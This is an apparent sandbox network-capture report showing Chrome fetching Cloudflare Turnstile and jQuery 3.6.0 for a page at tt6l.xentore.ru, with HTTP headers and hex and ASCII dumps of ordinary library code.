                                                                                                                  2024-12-19 10:42:52 UTC1369INData Raw: 43 28 6d 2c 62 2c 78 2c 53 2c 42 2c 34 2c 41 5b 34 30 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c 6d 2c 62 2c 77 2c 31 35 2c 41 5b 35 30 5d
                                                                                                                  Data Ascii: C(m,b,x,S,B,4,A[40]),S=C(S,m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,m,b,w,15,A[50]


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  2192.168.2.1649721104.18.94.414436456C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-12-19 10:42:52 UTC559OUTGET /turnstile/v0/api.js?render=explicit HTTP/1.1
                                                                                                                  Host: challenges.cloudflare.com
                                                                                                                  Connection: keep-alive
                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                  Accept: */*
                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                  Referer: https://tt6l.xentore.ru/
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  2024-12-19 10:42:52 UTC386INHTTP/1.1 302 Found
                                                                                                                  Date: Thu, 19 Dec 2024 10:42:52 GMT
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  access-control-allow-origin: *
                                                                                                                  cache-control: max-age=300, stale-if-error=10800, stale-while-revalidate=300, public
                                                                                                                  cross-origin-resource-policy: cross-origin
                                                                                                                  location: /turnstile/v0/b/787bc399e22f/api.js
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8f46c9d7bc0842b0-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  3192.168.2.1649722151.101.194.1374436456C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-12-19 10:42:52 UTC533OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                                                                                  Host: code.jquery.com
                                                                                                                  Connection: keep-alive
                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                  Accept: */*
                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                  Referer: https://tt6l.xentore.ru/
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  2024-12-19 10:42:52 UTC613INHTTP/1.1 200 OK
                                                                                                                  Connection: close
                                                                                                                  Content-Length: 89501
                                                                                                                  Server: nginx
                                                                                                                  Content-Type: application/javascript; charset=utf-8
                                                                                                                  Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                                                                  ETag: "28feccc0-15d9d"
                                                                                                                  Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                  Cross-Origin-Resource-Policy: cross-origin
                                                                                                                  Via: 1.1 varnish, 1.1 varnish
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  Age: 3126504
                                                                                                                  Date: Thu, 19 Dec 2024 10:42:52 GMT
                                                                                                                  X-Served-By: cache-lga21931-LGA, cache-ewr-kewr1740035-EWR
                                                                                                                  X-Cache: HIT, HIT
                                                                                                                  X-Cache-Hits: 2774, 0
                                                                                                                  X-Timer: S1734604973.757790,VS0,VE0
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  2024-12-19 10:42:52 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                                                                  Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                                                                  2024-12-19 10:42:52 UTC1378INData Raw: 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 73 2e 63 61 6c 6c 28 74 68 69 73 29 3a 65 3c 30 3f 74 68 69 73 5b 65 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 53 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 65 29 3b 72 65 74 75 72 6e 20 74 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 74 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 53 2e 65 61 63 68 28 74 68 69 73 2c 65 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 6d 61 70 28 74 68 69 73 2c 66
                                                                                                                  Data Ascii: },get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,f
                                                                                                                  2024-12-19 10:42:52 UTC1378INData Raw: 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3b 72 65 74 75 72 6e 21 28 21 65 7c 7c 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6f 2e 63 61 6c 6c 28 65 29 29 26 26 28 21 28 74 3d 72 28 65 29 29 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 6e 3d 76 2e 63 61 6c 6c 28 74 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 26 26 61 2e 63 61 6c 6c 28 6e 29 3d 3d 3d 6c 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 66 6f 72 28 74 20 69 6e 20 65 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 67 6c 6f 62 61 6c 45 76 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 62 28 65 2c 7b 6e 6f 6e 63 65 3a 74 26 26 74 2e 6e 6f
                                                                                                                  Data Ascii: on(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.no
                                                                                                                  2024-12-19 10:42:52 UTC1378INData Raw: 5d 2c 71 3d 74 2e 70 6f 70 2c 4c 3d 74 2e 70 75 73 68 2c 48 3d 74 2e 70 75 73 68 2c 4f 3d 74 2e 73 6c 69 63 65 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 65 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 69 66 28 65 5b 6e 5d 3d 3d 3d 74 29 72 65 74 75 72 6e 20 6e 3b 72 65 74 75 72 6e 2d 31 7d 2c 52 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f 6e 6c 79 7c 72 65 71 75 69 72 65 64 7c 73 63 6f 70 65 64 22 2c 4d 3d 22 5b 5c 5c 78 32 30 5c 5c 74
                                                                                                                  Data Ascii: ],q=t.pop,L=t.push,H=t.push,O=t.slice,P=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},R="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t
                                                                                                                  2024-12-19 10:42:52 UTC1378INData Raw: 2c 65 65 3d 2f 5b 2b 7e 5d 2f 2c 74 65 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31 2c 36 7d 22 2b 4d 2b 22 3f 7c 5c 5c 5c 5c 28 5b 5e 5c 5c 72 5c 5c 6e 5c 5c 66 5d 29 22 2c 22 67 22 29 2c 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 30 78 22 2b 65 2e 73 6c 69 63 65 28 31 29 2d 36 35 35 33 36 3b 72 65 74 75 72 6e 20 74 7c 7c 28 6e 3c 30 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 2b 36 35 35 33 36 29 3a 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 3e 3e 31 30 7c 35 35 32 39 36 2c 31 30 32 33 26 6e 7c 35 36 33 32 30 29 29 7d 2c 72 65 3d 2f 28 5b 5c 30 2d 5c 78 31 66 5c 78 37 66 5d 7c 5e 2d 3f 5c 64 29 7c 5e 2d 24 7c 5b 5e 5c 30 2d 5c 78 31 66 5c
                                                                                                                  Data Ascii: ,ee=/[+~]/,te=new RegExp("\\\\[\\da-fA-F]{1,6}"+M+"?|\\\\([^\\r\\n\\f])","g"),ne=function(e,t){var n="0x"+e.slice(1)-65536;return t||(n<0?String.fromCharCode(n+65536):String.fromCharCode(n>>10|55296,1023&n|56320))},re=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\
                                                                                                                  2024-12-19 10:42:52 UTC1378INData Raw: 29 29 7b 28 66 3d 65 65 2e 74 65 73 74 28 74 29 26 26 79 65 28 65 2e 70 61 72 65 6e 74 4e 6f 64 65 29 7c 7c 65 29 3d 3d 3d 65 26 26 64 2e 73 63 6f 70 65 7c 7c 28 28 73 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 73 3d 73 2e 72 65 70 6c 61 63 65 28 72 65 2c 69 65 29 3a 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 73 3d 53 29 29 2c 6f 3d 28 6c 3d 68 28 74 29 29 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 6f 2d 2d 29 6c 5b 6f 5d 3d 28 73 3f 22 23 22 2b 73 3a 22 3a 73 63 6f 70 65 22 29 2b 22 20 22 2b 78 65 28 6c 5b 6f 5d 29 3b 63 3d 6c 2e 6a 6f 69 6e 28 22 2c 22 29 7d 74 72 79 7b 72 65 74 75 72 6e 20 48 2e 61 70 70 6c 79 28 6e 2c 66 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 63 29 29 2c 6e 7d 63 61 74 63 68 28
                                                                                                                  Data Ascii: )){(f=ee.test(t)&&ye(e.parentNode)||e)===e&&d.scope||((s=e.getAttribute("id"))?s=s.replace(re,ie):e.setAttribute("id",s=S)),o=(l=h(t)).length;while(o--)l[o]=(s?"#"+s:":scope")+" "+xe(l[o]);c=l.join(",")}try{return H.apply(n,f.querySelectorAll(c)),n}catch(
                                                                                                                  2024-12-19 10:42:52 UTC1378INData Raw: 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 61 28 5b 5d 2c 65 2e 6c 65 6e 67 74 68 2c 6f 29 2c 69 3d 72 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 69 2d 2d 29 65 5b 6e 3d 72 5b 69 5d 5d 26 26 28 65 5b 6e 5d 3d 21 28 74 5b 6e 5d 3d 65 5b 6e 5d 29 29 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 79 65 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 26 26 65 7d 66 6f 72 28 65 20 69 6e 20 64 3d 73 65 2e 73 75 70 70 6f 72 74 3d 7b 7d 2c 69 3d 73 65 2e 69 73 58 4d 4c 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 26 26 65 2e 6e 61 6d 65 73 70 61 63 65 55 52 49 2c 6e 3d 65 26 26 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c
                                                                                                                  Data Ascii: ion(e,t){var n,r=a([],e.length,o),i=r.length;while(i--)e[n=r[i]]&&(e[n]=!(t[n]=e[n]))})})}function ye(e){return e&&"undefined"!=typeof e.getElementsByTagName&&e}for(e in d=se.support={},i=se.isXML=function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument|
                                                                                                                  2024-12-19 10:42:52 UTC1378INData Raw: 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 72 65 70 6c 61 63 65 28 74 65 2c 6e 65 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 26 26 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 3b 72 65 74 75 72 6e 20 74 26 26 74 2e 76 61 6c 75 65 3d 3d 3d 6e 7d 7d 2c 62 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 45 29 7b 76 61 72 20 6e 2c 72 2c 69 2c 6f 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 69 66 28 6f 29 7b 69 66 28 28
                                                                                                                  Data Ascii: tion(e){var n=e.replace(te,ne);return function(e){var t="undefined"!=typeof e.getAttributeNode&&e.getAttributeNode("id");return t&&t.value===n}},b.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&E){var n,r,i,o=t.getElementById(e);if(o){if((
                                                                                                                  2024-12-19 10:42:52 UTC1378INData Raw: 5b 22 2b 4d 2b 22 2a 6e 61 6d 65 22 2b 4d 2b 22 2a 3d 22 2b 4d 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 53 2b 22 2b 2a 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 2e 23 2e 2b 5b 2b 7e 5d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5c 5c 5c 66 22 29 2c 76 2e 70 75 73 68 28 22 5b 5c 5c 72 5c 5c 6e 5c 5c 66 5d 22 29 7d 29 2c 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 61 20 68 72 65 66 3d 27 27 20 64 69 73 61 62 6c 65 64 3d 27
                                                                                                                  Data Ascii: ["+M+"*name"+M+"*="+M+"*(?:''|\"\")"),e.querySelectorAll(":checked").length||v.push(":checked"),e.querySelectorAll("a#"+S+"+*").length||v.push(".#.+[+~]"),e.querySelectorAll("\\\f"),v.push("[\\r\\n\\f]")}),ce(function(e){e.innerHTML="<a href='' disabled='
                                                                                                                  2024-12-19 10:42:52 UTC1378INData Raw: 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 6e 7c 7c 28 31 26 28 6e 3d 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 3d 3d 28 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 29 3f 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 74 29 3a 31 29 7c 7c 21 64 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 65 29 3d 3d 3d 6e 3f 65 3d 3d 43 7c 7c 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70 26 26 79 28 70 2c 65 29 3f 2d 31 3a 74 3d 3d 43 7c 7c 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70
                                                                                                                  Data Ascii: e.compareDocumentPosition-!t.compareDocumentPosition;return n||(1&(n=(e.ownerDocument||e)==(t.ownerDocument||t)?e.compareDocumentPosition(t):1)||!d.sortDetached&&t.compareDocumentPosition(e)===n?e==C||e.ownerDocument==p&&y(p,e)?-1:t==C||t.ownerDocument==p


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  4192.168.2.1649723104.18.94.414436456C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-12-19 10:42:54 UTC558OUTGET /turnstile/v0/b/787bc399e22f/api.js HTTP/1.1
                                                                                                                  Host: challenges.cloudflare.com
                                                                                                                  Connection: keep-alive
                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                  Accept: */*
                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                  Referer: https://tt6l.xentore.ru/
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  2024-12-19 10:42:54 UTC471INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 19 Dec 2024 10:42:54 GMT
                                                                                                                  Content-Type: application/javascript; charset=UTF-8
                                                                                                                  Content-Length: 47692
                                                                                                                  Connection: close
                                                                                                                  accept-ranges: bytes
                                                                                                                  last-modified: Tue, 10 Dec 2024 17:31:41 GMT
                                                                                                                  cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                                                                  access-control-allow-origin: *
                                                                                                                  cross-origin-resource-policy: cross-origin
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8f46c9e21cbf41e7-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  2024-12-19 10:42:54 UTC1369INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 75 5d 28 67 29 2c 6c 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 6e 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 6c 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 6c 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 42 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                                                                                                  Data Ascii: "use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);funct
                                                                                                                  2024-12-19 10:42:54 UTC1369INData Raw: 74 28 65 29 7b 69 66 28 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 65 29 29 72 65 74 75 72 6e 20 65 7d 66 75 6e 63 74 69 6f 6e 20 71 74 28 65 2c 72 29 7b 76 61 72 20 6e 3d 65 3d 3d 6e 75 6c 6c 3f 6e 75 6c 6c 3a 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 7c 7c 65 5b 22 40 40 69 74 65 72 61 74 6f 72 22 5d 3b 69 66 28 6e 21 3d 6e 75 6c 6c 29 7b 76 61 72 20 6f 3d 5b 5d 2c 63 3d 21 30 2c 75 3d 21 31 2c 67 2c 68 3b 74 72 79 7b 66 6f 72 28 6e 3d 6e 2e 63 61 6c 6c 28 65 29 3b 21 28 63 3d 28 67 3d 6e 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 29 26 26 28 6f 2e 70 75 73 68 28 67 2e 76 61 6c 75 65 29 2c 21 28 72 26 26 6f 2e 6c 65 6e 67 74 68 3d 3d 3d 72 29 29 3b 63 3d 21 30 29
                                                                                                                  Data Ascii: t(e){if(Array.isArray(e))return e}function qt(e,r){var n=e==null?null:typeof Symbol!="undefined"&&e[Symbol.iterator]||e["@@iterator"];if(n!=null){var o=[],c=!0,u=!1,g,h;try{for(n=n.call(e);!(c=(g=n.next()).done)&&(o.push(g.value),!(r&&o.length===r));c=!0)
                                                                                                                  2024-12-19 10:42:54 UTC1369INData Raw: 5d 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 6c 28 70 29 7b 69 66 28 6f 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 47 65 6e 65 72 61 74 6f 72 20 69 73 20 61 6c 72 65 61 64 79 20 65 78 65 63 75 74 69 6e 67 2e 22 29 3b 66 6f 72 28 3b 67 26 26 28 67 3d 30 2c 70 5b 30 5d 26 26 28 6e 3d 30 29 29 2c 6e 3b 29 74 72 79 7b 69 66 28 6f 3d 31 2c 63 26 26 28 75 3d 70 5b 30 5d 26 32 3f 63 2e 72 65 74 75 72 6e 3a 70 5b 30 5d 3f 63 2e 74 68 72 6f 77 7c 7c 28 28 75 3d 63 2e 72 65 74 75 72 6e 29 26 26 75 2e 63 61 6c 6c 28 63 29 2c 30 29 3a 63 2e 6e 65 78 74 29 26 26 21 28 75 3d 75 2e 63 61 6c 6c 28 63 2c 70 5b 31 5d 29 29 2e 64 6f 6e 65 29 72 65 74 75 72 6e 20 75 3b 73 77 69 74 63 68 28 63 3d 30 2c 75 26 26 28 70 3d 5b 70 5b 30 5d 26 32 2c 75 2e 76 61 6c
                                                                                                                  Data Ascii: ])}}function l(p){if(o)throw new TypeError("Generator is already executing.");for(;g&&(g=0,p[0]&&(n=0)),n;)try{if(o=1,c&&(u=p[0]&2?c.return:p[0]?c.throw||((u=c.return)&&u.call(c),0):c.next)&&!(u=u.call(c,p[1])).done)return u;switch(c=0,u&&(p=[p[0]&2,u.val
                                                                                                                  2024-12-19 10:42:54 UTC1369INData Raw: 29 29 3b 76 61 72 20 50 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 2c 65 2e 4c 49 47 48 54 3d 22 6c 69 67 68 74 22 2c 65 2e 44 41 52 4b 3d 22 64 61 72 6b 22 7d 29 28 50 65 7c 7c 28 50 65 3d 7b 7d 29 29 3b 76 61 72 20 53 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 56 45 52 49 46 59 49 4e 47 3d 22 76 65 72 69 66 79 69 6e 67 22 2c 65 2e 56 45 52 49 46 59 49 4e 47 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 3d 22 76 65 72 69 66 79 69 6e 67 2d 68 61 76 69 6e 67 2d 74 72 6f 75 62 6c 65 73 22 2c 65 2e 56 45 52 49 46 59 49 4e 47 5f 4f 56 45 52 52 55 4e 3d 22 76 65 72 69 66 79 69 6e 67 2d 6f 76 65 72 72 75 6e 22 2c 65 2e 46 41 49 4c 55 52 45 5f 57 4f 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 3d 22 66 61 69
                                                                                                                  Data Ascii: ));var Pe;(function(e){e.AUTO="auto",e.LIGHT="light",e.DARK="dark"})(Pe||(Pe={}));var Se;(function(e){e.VERIFYING="verifying",e.VERIFYING_HAVING_TROUBLES="verifying-having-troubles",e.VERIFYING_OVERRUN="verifying-overrun",e.FAILURE_WO_HAVING_TROUBLES="fai
